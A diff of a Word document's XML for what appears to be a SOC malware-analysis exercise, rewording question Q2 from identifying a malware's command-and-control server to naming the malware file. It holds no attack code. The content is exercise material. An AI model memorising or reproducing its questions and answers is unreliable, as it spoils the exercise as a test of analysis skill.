-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>web</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -1113,10 +1386,10 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5504EB04" wp14:editId="0940919F">
-            <wp:extent cx="5943600" cy="2793365"/>
-            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
-            <wp:docPr id="721096579" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38F3C2F7" wp14:editId="1ED6A687">
+            <wp:extent cx="5943600" cy="2896870"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="91002472" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1124,7 +1397,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="721096579" name=""/>
+                    <pic:cNvPr id="91002472" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -1136,7 +1409,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2793365"/>
+                      <a:ext cx="5943600" cy="2896870"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1165,26 +1438,24 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Top of Form</w:t>
+        <w:t>Bottom of Form</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1195,13 +1466,329 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q2</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Clearly</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identifying</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>improves</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>communication</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>among</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the SOC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>team</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>associated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>this</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1219,7 +1806,43 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Identifying</w:t>
+        <w:t>Note</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Don't</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>include</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1237,294 +1860,6 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>command</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>control</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (C2) </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>server</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>that</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>communicates</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>with</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> can </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>help</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>trace</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>back</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>attacker</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Which</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> C2 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>server</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>does</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in the PPT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
         <w:t>file</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -1543,34 +1878,34 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>communicate</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>with</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>?</w:t>
+        <w:t>extension</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1581,94 +1916,6 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Scanned</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> đầu tiên vào lúc </w:t>
